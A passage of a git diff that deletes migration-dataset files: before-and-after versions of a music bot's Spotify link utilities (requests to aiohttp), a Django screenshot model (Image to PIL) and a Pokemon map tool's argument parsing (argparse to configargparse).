-- if re.search(regex, url): -- result = regex.search(url) -+ if re.search(url_regex, url): -+ result = url_regex.search(url) - url = result.group(0) - -- page = requests.get(url) -- soup = BeautifulSoup(page.content, 'html.parser') -+ async with aiohttp.ClientSession(headers={'User-Agent': 'python-requests/2.20.0'}) as session: -+ async with session.get(url) as response: -+ page = await response.text() -+ -+ soup = BeautifulSoup(page, 'html.parser') - - title = soup.find('title') - title = title.string -@@ -42,7 +46,7 @@ def convert_spotify(url): - return title - - --def get_spotify_playlist(url): -+async def get_spotify_playlist(url): - """Return Spotify_Playlist class""" - - code = url.split('/')[4].split('?')[0] -@@ -92,11 +96,12 @@ def get_spotify_playlist(url): - if config.SPOTIFY_ID != "" or config.SPOTIFY_SECRET != "": - print("ERROR: Check spotify CLIENT_ID and SECRET") - -- headers = { -- "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"} - -- page = requests.get(url, headers=headers) -- soup = BeautifulSoup(page.content, 'html.parser') -+ async with aiohttp.ClientSession(headers={'User-Agent': 'python-requests/2.20.0'}) as session: -+ async with session.get(url) as response: -+ page = await response.text() -+ -+ soup = BeautifulSoup(page, 'html.parser') - - results = soup.find_all(property="music:song", attrs={"content": True}) - -@@ -157,7 +162,7 @@ def identify_url(url): - if "https://open.spotify.com/track" in url: - return Sites.Spotify - -- if "https://open.spotify.com/playlist"in url or "https://open.spotify.com/album" in url: -+ if "https://open.spotify.com/playlist" in url or "https://open.spotify.com/album" in url: - return Sites.Spotify_Playlist - - if "bandcamp.com/track/" in url: -@@ -183,7 +188,7 @@ def identify_playlist(url): - if "playlist?list=" in url: - return Playlist_Types.YouTube_Playlist - -- if "https://open.spotify.com/playlist"in url or "https://open.spotify.com/album" in url: -+ if "https://open.spotify.com/playlist" in url or "https://open.spotify.com/album" in url: - return Playlist_Types.Spotify_Playlist - - if "bandcamp.com/album/" in url: diff --git a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.source.py b/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.source.py deleted file mode 100644 index 96c3744..0000000 --- a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.source.py +++ /dev/null @@ -1,192 +0,0 @@ -import requests -import re -from bs4 import BeautifulSoup -from enum import Enum -from config import config - -import spotipy -from spotipy.oauth2 import SpotifyClientCredentials - - -try: - sp_api = spotipy.Spotify(auth_manager=SpotifyClientCredentials( - client_id=config.SPOTIFY_ID, client_secret=config.SPOTIFY_SECRET)) - api = True -except: - api = False - - -def clean_sclink(track): - if track.startswith("https://m."): - track = track.replace("https://m.", "https://") - if track.startswith("http://m."): - track = track.replace("http://m.", "https://") - return track - - -def convert_spotify(url): - regex = re.compile( - "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") - - if re.search(regex, url): - result = regex.search(url) - url = result.group(0) - - page = requests.get(url) - soup = BeautifulSoup(page.content, 'html.parser') - - title = soup.find('title') - title = title.string - title = title.replace(', a song by', '').replace(' on Spotify', '') - - return title - - -def get_spotify_playlist(url): - """Return Spotify_Playlist class""" - - code = url.split('/')[4].split('?')[0] - - if api == True: - - if "open.spotify.com/album" in url: - try: - results = sp_api.album_tracks(code) - tracks = results['items'] - - while results['next']: - results = sp_api.next(results) - tracks.extend(results['items']) - - links = [] - - for track in tracks: - try: - links.append(track['external_urls']['spotify']) - except: - pass - return links - except: - if config.SPOTIFY_ID != "" or config.SPOTIFY_SECRET != "": - print("ERROR: Check spotify CLIENT_ID and SECRET") - - if "open.spotify.com/playlist" in url: - try: - results = sp_api.playlist_items(code) - tracks = results['items'] - while results['next']: - results = sp_api.next(results) - tracks.extend(results['items']) - - links = [] - - for track in tracks: - try: - links.append( - track['track']['external_urls']['spotify']) - except: - pass - return links - - except: - if config.SPOTIFY_ID != "" or config.SPOTIFY_SECRET != "": - print("ERROR: Check spotify CLIENT_ID and SECRET") - - headers = { - "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"} - - page = requests.get(url, headers=headers) - soup = BeautifulSoup(page.content, 'html.parser') - - results = soup.find_all(property="music:song", attrs={"content": True}) - - links = [] - - for item in results: - links.append(item['content']) - - title = soup.find('title') - title = title.string - - return links - - -def get_url(content): - - regex = re.compile( - "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") - - if re.search(regex, content): - result = regex.search(content) - url = result.group(0) - return url - else: - return None - - -class Sites(Enum): - Spotify = "Spotify" - Spotify_Playlist = "Spotify Playlist" - YouTube = "YouTube" - Twitter = "Twitter" - SoundCloud = "SoundCloud" - Bandcamp = "Bandcamp" - Custom = "Custom" - Unknown = "Unknown" - - -class Playlist_Types(Enum): - Spotify_Playlist = "Spotify Playlist" - YouTube_Playlist = "YouTube Playlist" - BandCamp_Playlist = "BandCamp Playlist" - Unknown = "Unknown" - - -class Origins(Enum): - Default = "Default" - Playlist = "Playlist" - - -def identify_url(url): - if url is None: - return Sites.Unknown - - if "https://www.youtu" in url or "https://youtu.be" in url: - return Sites.YouTube - - if "https://open.spotify.com/track" in url: - return Sites.Spotify - - if "https://open.spotify.com/playlist"in url or "https://open.spotify.com/album" in url: - return Sites.Spotify_Playlist - - if "bandcamp.com/track/" in url: - return Sites.Bandcamp - - if "https://twitter.com/" in url: - return Sites.Twitter - - if url.lower().endswith(config.SUPPORTED_EXTENSIONS): - return Sites.Custom - - if "soundcloud.com/" in url: - return Sites.SoundCloud - - # If no match - return Sites.Unknown - - -def identify_playlist(url): - if url is None: - return Sites.Unknown - - if "playlist?list=" in url: - return Playlist_Types.YouTube_Playlist - - if "https://open.spotify.com/playlist"in url or "https://open.spotify.com/album" in url: - return Playlist_Types.Spotify_Playlist - - if "bandcamp.com/album/" in url: - return Playlist_Types.BandCamp_Playlist - - return Playlist_Types.Unknown diff --git a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.target.py b/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.target.py deleted file mode 100644 index f5731fd..0000000 --- a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.target.py +++ /dev/null @@ -1,197 +0,0 @@ -import aiohttp -import re -from bs4 import BeautifulSoup -from enum import Enum -from config import config - -import spotipy -from spotipy.oauth2 import SpotifyClientCredentials - - -try: - sp_api = spotipy.Spotify(auth_manager=SpotifyClientCredentials( - client_id=config.SPOTIFY_ID, client_secret=config.SPOTIFY_SECRET)) - api = True -except: - api = False - -url_regex = re.compile( - "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") - - -def clean_sclink(track): - if track.startswith("https://m."): - track = track.replace("https://m.", "https://") - if track.startswith("http://m."): - track = track.replace("http://m.", "https://") - return track - - -async def convert_spotify(url): - - if re.search(url_regex, url): - result = url_regex.search(url) - url = result.group(0) - - async with aiohttp.ClientSession(headers={'User-Agent': 'python-requests/2.20.0'}) as session: - async with session.get(url) as response: - page = await response.text() - - soup = BeautifulSoup(page, 'html.parser') - - title = soup.find('title') - title = title.string - title = title.replace(', a song by', '').replace(' on Spotify', '') - - return title - - -async def get_spotify_playlist(url): - """Return Spotify_Playlist class""" - - code = url.split('/')[4].split('?')[0] - - if api == True: - - if "open.spotify.com/album" in url: - try: - results = sp_api.album_tracks(code) - tracks = results['items'] - - while results['next']: - results = sp_api.next(results) - tracks.extend(results['items']) - - links = [] - - for track in tracks: - try: - links.append(track['external_urls']['spotify']) - except: - pass - return links - except: - if config.SPOTIFY_ID != "" or config.SPOTIFY_SECRET != "": - print("ERROR: Check spotify CLIENT_ID and SECRET") - - if "open.spotify.com/playlist" in url: - try: - results = sp_api.playlist_items(code) - tracks = results['items'] - while results['next']: - results = sp_api.next(results) - tracks.extend(results['items']) - - links = [] - - for track in tracks: - try: - links.append( - track['track']['external_urls']['spotify']) - except: - pass - return links - - except: - if config.SPOTIFY_ID != "" or config.SPOTIFY_SECRET != "": - print("ERROR: Check spotify CLIENT_ID and SECRET") - - - async with aiohttp.ClientSession(headers={'User-Agent': 'python-requests/2.20.0'}) as session: - async with session.get(url) as response: - page = await response.text() - - soup = BeautifulSoup(page, 'html.parser') - - results = soup.find_all(property="music:song", attrs={"content": True}) - - links = [] - - for item in results: - links.append(item['content']) - - title = soup.find('title') - title = title.string - - return links - - -def get_url(content): - - regex = re.compile( - "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") - - if re.search(regex, content): - result = regex.search(content) - url = result.group(0) - return url - else: - return None - - -class Sites(Enum): - Spotify = "Spotify" - Spotify_Playlist = "Spotify Playlist" - YouTube = "YouTube" - Twitter = "Twitter" - SoundCloud = "SoundCloud" - Bandcamp = "Bandcamp" - Custom = "Custom" - Unknown = "Unknown" - - -class Playlist_Types(Enum): - Spotify_Playlist = "Spotify Playlist" - YouTube_Playlist = "YouTube Playlist" - BandCamp_Playlist = "BandCamp Playlist" - Unknown = "Unknown" - - -class Origins(Enum): - Default = "Default" - Playlist = "Playlist" - - -def identify_url(url): - if url is None: - return Sites.Unknown - - if "https://www.youtu" in url or "https://youtu.be" in url: - return Sites.YouTube - - if "https://open.spotify.com/track" in url: - return Sites.Spotify - - if "https://open.spotify.com/playlist" in url or "https://open.spotify.com/album" in url: - return Sites.Spotify_Playlist - - if "bandcamp.com/track/" in url: - return Sites.Bandcamp - - if "https://twitter.com/" in url: - return Sites.Twitter - - if url.lower().endswith(config.SUPPORTED_EXTENSIONS): - return Sites.Custom - - if "soundcloud.com/" in url: - return Sites.SoundCloud - - # If no match - return Sites.Unknown - - -def identify_playlist(url): - if url is None: - return Sites.Unknown - - if "playlist?list=" in url: - return Playlist_Types.YouTube_Playlist - - if "https://open.spotify.com/playlist" in url or "https://open.spotify.com/album" in url: - return Playlist_Types.Spotify_Playlist - - if "bandcamp.com/album/" in url: - return Playlist_Types.BandCamp_Playlist - - return Playlist_Types.Unknown diff --git a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.diff b/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.diff deleted file mode 100644 index dd8bcf8..0000000 --- a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/observatory/dashboard/models/Screenshot.py b/observatory/dashboard/models/Screenshot.py - index 9aa7fe2d1b18a8df9d38a53986e19229a817bcb6..f970b543dc349460492a32a11731738062bfcc09 100644 - --- a/observatory/dashboard/models/Screenshot.py - +++ b/observatory/dashboard/models/Screenshot.py -@@ -12,7 +12,7 @@ - # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF - # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - --import Image -+from PIL import Image - import os - from django.db import models - from settings import SCREENSHOT_URL, SCREENSHOT_PATH diff --git a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.source.py b/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.source.py deleted file mode 100644 index ba35333..0000000 --- a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.source.py +++ /dev/null @@ -1,118 +0,0 @@ -# Copyright (c) 2010, individual contributors (see AUTHORS file) -# -# Permission to use, copy, modify, and/or distribute this software for any -# purpose with or without fee is hereby granted, provided that the above -# copyright notice and this permission notice appear in all copies. -# -# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - -import Image -import os -from django.db import models -from settings import SCREENSHOT_URL, SCREENSHOT_PATH -from Project import Project - -SCREENSHOT_WIDTH = 230.0 -SCREENSHOT_HEIGHT = 170.0 - -MAIN_PAGE_WIDTH = 605.0 -MAIN_PAGE_HEIGHT = 300.0 - -# a screenshot for a project, display on its page. its filename is derived from -# its ID, so it is not required as a field -class Screenshot(models.Model): - class Meta: - app_label = 'dashboard' - - # the title of the screenshot - title = models.CharField(max_length = 32) - - # a short description of the screenshot - description = models.CharField(max_length = 100) - - # what project is this a screenshot of? - project = models.ForeignKey(Project) - - # file extension - extension = models.CharField(max_length = 8) - - # save override to validate title/description length - def save(self, *args, **kwargs): - self.title = self.title[0:32] - self.description = self.description[0:100] - super(Screenshot, self).save(*args, **kwargs) - - # the filename for this file. just the last part, no directory specified. - def filename(self): - return "{0}{1}".format(str(self.id), self.extension) - - # the thumbnail filename for this file, no directory specified. - def thumbnail(self): - return str(self.id) + "_t.png" - - # the url of a screenshot - def url(self): - return os.path.join(SCREENSHOT_URL, self.filename()) - - # the thumbnail url of a screenshot - def thumb_url(self): - return os.path.join(SCREENSHOT_URL, self.thumbnail()) - - # the large thumbnail to be used on the main page - def main_page_url(self): - return os.path.join(SCREENSHOT_URL, str(self.id) + "_mp.png") - - # a static creation method to handle writing to disk - @staticmethod - def create(form, file, project): - # create a screenshot object in the database - screen = Screenshot(title = form.cleaned_data["title"], - description = form.cleaned_data["description"], - project = project, - extension = os.path.splitext(file.name)[1]) - screen.save() - - # write the screenshot to a file - path = os.path.join(SCREENSHOT_PATH, screen.filename()) - write = open(path, 'wb+') - - # write the chunks - for chunk in file.chunks(): - write.write(chunk) - write.close() - - def create_thumbnail(path, save, width, height): - # create a thumbnail of the file - img = Image.open(path) - - # resize the image for a thumbnail - scalex = width / img.size[0] - scaley = height / img.size[1] - scale = scalex if scalex > scaley else scaley - img = img.resize((int(img.size[0] * scale), - int(img.size[1] * scale)), - Image.ANTIALIAS) - - # crop the image to fit - if img.size[0] > width or img.size[1] > height: - left = (img.size[0] - width) / 2 - right = left + width - top = (img.size[1] - height) / 2 - bottom = top + height - img = img.crop((int(left), int(top), int(right), int(bottom))) - - # save the thumbnail - save_path = os.path.join(SCREENSHOT_PATH, save.format(str(screen.id))) - img.save(save_path, "PNG") - - create_thumbnail(path, "{0}_t.png", SCREENSHOT_WIDTH, SCREENSHOT_HEIGHT) - create_thumbnail(path, "{0}_mp.png", MAIN_PAGE_WIDTH, MAIN_PAGE_HEIGHT) - - return screen - diff --git a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.target.py b/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.target.py deleted file mode 100644 index 3cd2606..0000000 --- a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.target.py +++ /dev/null @@ -1,118 +0,0 @@ -# Copyright (c) 2010, individual contributors (see AUTHORS file) -# -# Permission to use, copy, modify, and/or distribute this software for any -# purpose with or without fee is hereby granted, provided that the above -# copyright notice and this permission notice appear in all copies. -# -# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - -from PIL import Image -import os -from django.db import models -from settings import SCREENSHOT_URL, SCREENSHOT_PATH -from Project import Project - -SCREENSHOT_WIDTH = 230.0 -SCREENSHOT_HEIGHT = 170.0 - -MAIN_PAGE_WIDTH = 605.0 -MAIN_PAGE_HEIGHT = 300.0 - -# a screenshot for a project, display on its page. its filename is derived from -# its ID, so it is not required as a field -class Screenshot(models.Model): - class Meta: - app_label = 'dashboard' - - # the title of the screenshot - title = models.CharField(max_length = 32) - - # a short description of the screenshot - description = models.CharField(max_length = 100) - - # what project is this a screenshot of? - project = models.ForeignKey(Project) - - # file extension - extension = models.CharField(max_length = 8) - - # save override to validate title/description length - def save(self, *args, **kwargs): - self.title = self.title[0:32] - self.description = self.description[0:100] - super(Screenshot, self).save(*args, **kwargs) - - # the filename for this file. just the last part, no directory specified. - def filename(self): - return "{0}{1}".format(str(self.id), self.extension) - - # the thumbnail filename for this file, no directory specified. - def thumbnail(self): - return str(self.id) + "_t.png" - - # the url of a screenshot - def url(self): - return os.path.join(SCREENSHOT_URL, self.filename()) - - # the thumbnail url of a screenshot - def thumb_url(self): - return os.path.join(SCREENSHOT_URL, self.thumbnail()) - - # the large thumbnail to be used on the main page - def main_page_url(self): - return os.path.join(SCREENSHOT_URL, str(self.id) + "_mp.png") - - # a static creation method to handle writing to disk - @staticmethod - def create(form, file, project): - # create a screenshot object in the database - screen = Screenshot(title = form.cleaned_data["title"], - description = form.cleaned_data["description"], - project = project, - extension = os.path.splitext(file.name)[1]) - screen.save() - - # write the screenshot to a file - path = os.path.join(SCREENSHOT_PATH, screen.filename()) - write = open(path, 'wb+') - - # write the chunks - for chunk in file.chunks(): - write.write(chunk) - write.close() - - def create_thumbnail(path, save, width, height): - # create a thumbnail of the file - img = Image.open(path) - - # resize the image for a thumbnail - scalex = width / img.size[0] - scaley = height / img.size[1] - scale = scalex if scalex > scaley else scaley - img = img.resize((int(img.size[0] * scale), - int(img.size[1] * scale)), - Image.ANTIALIAS) - - # crop the image to fit - if img.size[0] > width or img.size[1] > height: - left = (img.size[0] - width) / 2 - right = left + width - top = (img.size[1] - height) / 2 - bottom = top + height - img = img.crop((int(left), int(top), int(right), int(bottom))) - - # save the thumbnail - save_path = os.path.join(SCREENSHOT_PATH, save.format(str(screen.id))) - img.save(save_path, "PNG") - - create_thumbnail(path, "{0}_t.png", SCREENSHOT_WIDTH, SCREENSHOT_HEIGHT) - create_thumbnail(path, "{0}_mp.png", MAIN_PAGE_WIDTH, MAIN_PAGE_HEIGHT) - - return screen - diff --git a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.diff b/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.diff deleted file mode 100644 index e6021c7..0000000 --- a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.diff +++ /dev/null @@ -1,170 +0,0 @@ -diff --git a/pogom/utils.py b/pogom/utils.py - index dd1b7e1d31fa13e6a5d565b9ebdc9e9592dd709c..2960ec68f85274c37068e2577f28c44eecc4ff26 100644 - --- a/pogom/utils.py - +++ b/pogom/utils.py -@@ -3,23 +3,18 @@ - - import sys - import getpass --import argparse -+import configargparse - import re - import uuid - import os - import json - from datetime import datetime, timedelta --import ConfigParser - import platform - import logging - import shutil - - from . import config - --from exceptions import APIKeyException -- --DEFAULT_THREADS = 1 -- - logging.basicConfig(level=logging.INFO, format='%(asctime)s [%(module)11s] [%(levelname)7s] %(message)s') - log = logging.getLogger(__name__) - -@@ -33,90 +28,56 @@ def verify_config_file_exists(filename): - log.info("Could not find " + filename + ", copying default") - shutil.copy2(fullpath + '.example', fullpath) - --def parse_config(args): -- verify_config_file_exists('../config/config.ini') -- Config = ConfigParser.ConfigParser() -- Config.read(os.path.join(os.path.dirname(__file__), '../config/config.ini')) -- args.auth_service = Config.get('Authentication', 'Service') -- args.username = Config.get('Authentication', 'Username') -- args.password = Config.get('Authentication', 'Password') -- args.location = Config.get('Search_Settings', 'Location') -- args.step_limit = int(Config.get('Search_Settings', 'Steps')) -- args.scan_delay = int(Config.get('Search_Settings', 'Scan_delay')) -- args.no_pokemon = Config.getboolean('Search_Settings', 'Disable_Pokemon') -- args.no_pokestops = Config.getboolean('Search_Settings', 'Disable_Pokestops') -- args.no_gyms = Config.getboolean('Search_Settings', 'Disable_Gyms') -- if Config.get('Misc', 'Google_Maps_API_Key') : -- args.gmaps_key = Config.get('Misc', 'Google_Maps_API_Key') -- args.host = Config.get('Misc', 'Host') -- args.port = Config.get('Misc', 'Port') -- -- return args -- --def parse_db_config(args): -- verify_config_file_exists('../config/config.ini') -- Config = ConfigParser.ConfigParser() -- Config.read(os.path.join(os.path.dirname(__file__), '../config/config.ini')) -- args.db_type = Config.get('Database','Type') -- args.db_name = Config.get('Database', 'Database_Name') -- args.db_user = Config.get('Database', 'Database_User') -- args.db_pass = Config.get('Database', 'Database_Pass') -- args.db_host = Config.get('Database', 'Database_Host') -- -- return args -- - def get_args(): - # fuck PEP8 -- parser = argparse.ArgumentParser() -- parser.add_argument('-se', '--settings',action='store_true',default=False) -+ parser = configargparse.ArgParser(default_config_files=['config/config.ini']) - parser.add_argument('-a', '--auth-service', type=str.lower, help='Auth Service', default='ptc') -- parser.add_argument('-u', '--username', help='Username', required=False) -- parser.add_argument('-p', '--password', help='Password', required=False) -- parser.add_argument('-l', '--location', type=parse_unicode, help='Location, can be an address or coordinates', required=False) -- parser.add_argument('-st', '--step-limit', help='Steps', required=False, type=int) -- parser.add_argument('-sd', '--scan-delay', help='Time delay before beginning new scan', required=False, type=int, default=1) -- parser.add_argument('-dc','--display-in-console',help='Display Found Pokemon in Console',action='store_true',default=False) -+ parser.add_argument('-u', '--username', help='Username') -+ parser.add_argument('-p', '--password', help='Password') -+ parser.add_argument('-l', '--location', type=parse_unicode, help='Location, can be an address or coordinates') -+ parser.add_argument('-st', '--step-limit', help='Steps', type=int, default=12) -+ parser.add_argument('-sd', '--scan-delay', help='Time delay before beginning new scan', type=int, default=1) -+ parser.add_argument('-dc', '--display-in-console',help='Display Found Pokemon in Console',action='store_true', default=False) - parser.add_argument('-H', '--host', help='Set web server listening host', default='127.0.0.1') - parser.add_argument('-P', '--port', type=int, help='Set web server listening port', default=5000) -- parser.add_argument('-L', '--locale', help='Locale for Pokemon names: default en, check' -- 'locale folder for more options', default='en') -+ parser.add_argument('-L', '--locale', help='Locale for Pokemon names: default en, check locale folder for more options', default='en') - parser.add_argument('-c', '--china', help='Coordinates transformer for China', action='store_true') - parser.add_argument('-d', '--debug', help='Debug Mode', action='store_true') - parser.add_argument('-m', '--mock', help='Mock mode. Starts the web server but not the background thread.', action='store_true', default=False) -- parser.add_argument('-ns', '--no-server', help='No-Server Mode. Starts the searcher but not the Webserver.', action='store_true', default=False, dest='no_server') -- parser.add_argument('-os', '--only-server', help='Server-Only Mode. Starts only the Webserver without the searcher.', action='store_true', default=False, dest='only_server') -- parser.add_argument('-fl', '--fixed-location', help='Hides the search bar for use in shared maps.', action='store_true', default=False, dest='fixed_location') -- parser.add_argument('-k', '--google-maps-key', help='Google Maps Javascript API Key', default=None, dest='gmaps_key') -+ parser.add_argument('-ns', '--no-server', help='No-Server Mode. Starts the searcher but not the Webserver.', action='store_true', default=False) -+ parser.add_argument('-os', '--only-server', help='Server-Only Mode. Starts only the Webserver without the searcher.', action='store_true', default=False) -+ parser.add_argument('-fl', '--fixed-location', help='Hides the search bar for use in shared maps.', action='store_true', default=False) -+ parser.add_argument('-k', '--gmaps-key', help='Google Maps Javascript API Key', required=True) - parser.add_argument('-C', '--cors', help='Enable CORS on web server', action='store_true', default=False) - parser.add_argument('-D', '--db', help='Database filename', default='pogom.db') -- parser.add_argument('-t', '--threads', help='Number of search threads', required=False, type=int, default=DEFAULT_THREADS, dest='num_threads') -+ parser.add_argument('-t', '--num-threads', help='Number of search threads', type=int, default=1) - parser.add_argument('-np', '--no-pokemon', help='Disables Pokemon from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-ng', '--no-gyms', help='Disables Gyms from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-nk', '--no-pokestops', help='Disables PokeStops from the map (including parsing them into local db)', action='store_true', default=False) -+ parser.add_argument('--db-type', help='Type of database to be used (default: sqlite)', default='sqlite') -+ parser.add_argument('--db-name', help='Name of the database to be used') -+ parser.add_argument('--db-user', help='Username for the database') -+ parser.add_argument('--db-pass', help='Password for the database') -+ parser.add_argument('--db-host', help='IP or hostname for the database') - parser.set_defaults(DEBUG=False) -- args = parser.parse_args() - -- args = parse_db_config(args) -+ args = parser.parse_args() - -- if (args.settings): -- args = parse_config(args) -+ if args.only_server: -+ if args.location is None: -+ parser.print_usage() -+ print sys.argv[0] + ': error: arguments -l/--location is required' -+ sys.exit(1); - else: -- if args.only_server: -- if args.location is None: -- parser.print_usage() -- print sys.argv[0] + ': error: arguments -l/--location is required' -- sys.exit(1); -- else: -- if (args.username is None or args.location is None or args.step_limit is None): -- parser.print_usage() -- print sys.argv[0] + ': error: arguments -u/--username, -l/--location, -st/--step-limit are required' -- sys.exit(1); -- -- if config["PASSWORD"] is None and args.password is None: -- config["PASSWORD"] = args.password = getpass.getpass() -- elif args.password is None: -- args.password = config["PASSWORD"] -+ if (args.username is None or args.location is None or args.step_limit is None): -+ parser.print_usage() -+ print sys.argv[0] + ': error: arguments -u/--username, -l/--location, -st/--step-limit are required' -+ sys.exit(1); - -+ if config["PASSWORD"] is None and args.password is None: -+ config["PASSWORD"] = args.password = getpass.getpass() -+ elif args.password is None: -+ args.password = config["PASSWORD"] - - return args - -@@ -178,17 +139,3 @@ def get_pokemon_name(pokemon_id): - get_pokemon_name.names = json.loads(f.read()) - - return get_pokemon_name.names[str(pokemon_id)] -- --def load_credentials(filepath): -- verify_config_file_exists('../config/credentials.json') -- try: -- with open(filepath+os.path.sep+'/config/credentials.json') as file: -- creds = json.load(file) -- except IOError: -- creds = {} -- if not creds.get('gmaps_key'): -- raise APIKeyException(\ -- "No Google Maps Javascript API key entered in \config\credentials.json file!" -- " Please take a look at the wiki for instructions on how to generate this key," -- " then add that key to the file!") -- return creds diff --git a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.source.py b/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.source.py deleted file mode 100644 index f17c029..0000000 --- a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.source.py +++ /dev/null @@ -1,194 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- - -import sys -import getpass -import argparse -import re -import uuid -import os -import json -from datetime import datetime, timedelta -import ConfigParser -import platform -import logging -import shutil - -from . import config - -from exceptions import APIKeyException - -DEFAULT_THREADS = 1 - -logging.basicConfig(level=logging.INFO, format='%(asctime)s [%(module)11s] [%(levelname)7s] %(message)s') -log = logging.getLogger(__name__) - -def parse_unicode(bytestring): - decoded_string = bytestring.decode(sys.getfilesystemencoding()) - return decoded_string - -def verify_config_file_exists(filename): - fullpath = os.path.join(os.path.dirname(__file__), filename) - if os.path.exists(fullpath) is False: - log.info("Could not find " + filename + ", copying default") - shutil.copy2(fullpath + '.example', fullpath) - -def parse_config(args): - verify_config_file_exists('../config/config.ini') - Config = ConfigParser.ConfigParser() - Config.read(os.path.join(os.path.dirname(__file__), '../config/config.ini')) - args.auth_service = Config.get('Authentication', 'Service') - args.username = Config.get('Authentication', 'Username') - args.password = Config.get('Authentication', 'Password') - args.location = Config.get('Search_Settings', 'Location') - args.step_limit = int(Config.get('Search_Settings', 'Steps')) - args.scan_delay = int(Config.get('Search_Settings', 'Scan_delay')) - args.no_pokemon = Config.getboolean('Search_Settings', 'Disable_Pokemon') - args.no_pokestops = Config.getboolean('Search_Settings', 'Disable_Pokestops') - args.no_gyms = Config.getboolean('Search_Settings', 'Disable_Gyms') - if Config.get('Misc', 'Google_Maps_API_Key') : - args.gmaps_key = Config.get('Misc', 'Google_Maps_API_Key') - args.host = Config.get('Misc', 'Host') - args.port = Config.get('Misc', 'Port') - - return args - -def parse_db_config(args): - verify_config_file_exists('../config/config.ini') - Config = ConfigParser.ConfigParser() - Config.read(os.path.join(os.path.dirname(__file__), '../config/config.ini')) - args.db_type = Config.get('Database','Type') - args.db_name = Config.get('Database', 'Database_Name') - args.db_user = Config.get('Database', 'Database_User') - args.db_pass = Config.get('Database', 'Database_Pass') - args.db_host = Config.get('Database', 'Database_Host') - - return args - -def get_args(): - # fuck PEP8 - parser = argparse.ArgumentParser() - parser.add_argument('-se', '--settings',action='store_true',default=False) - parser.add_argument('-a', '--auth-service', type=str.lower, help='Auth Service', default='ptc') - parser.add_argument('-u', '--username', help='Username', required=False) - parser.add_argument('-p', '--password', help='Password', required=False) - parser.add_argument('-l', '--location', type=parse_unicode, help='Location, can be an address or coordinates', required=False) - parser.add_argument('-st', '--step-limit', help='Steps', required=False, type=int) - parser.add_argument('-sd', '--scan-delay', help='Time delay before beginning new scan', required=False, type=int, default=1) - parser.add_argument('-dc','--display-in-console',help='Display Found Pokemon in Console',action='store_true',default=False) - parser.add_argument('-H', '--host', help='Set web server listening host', default='127.0.0.1') - parser.add_argument('-P', '--port', type=int, help='Set web server listening port', default=5000) - parser.add_argument('-L', '--locale', help='Locale for Pokemon names: default en, check' - 'locale folder 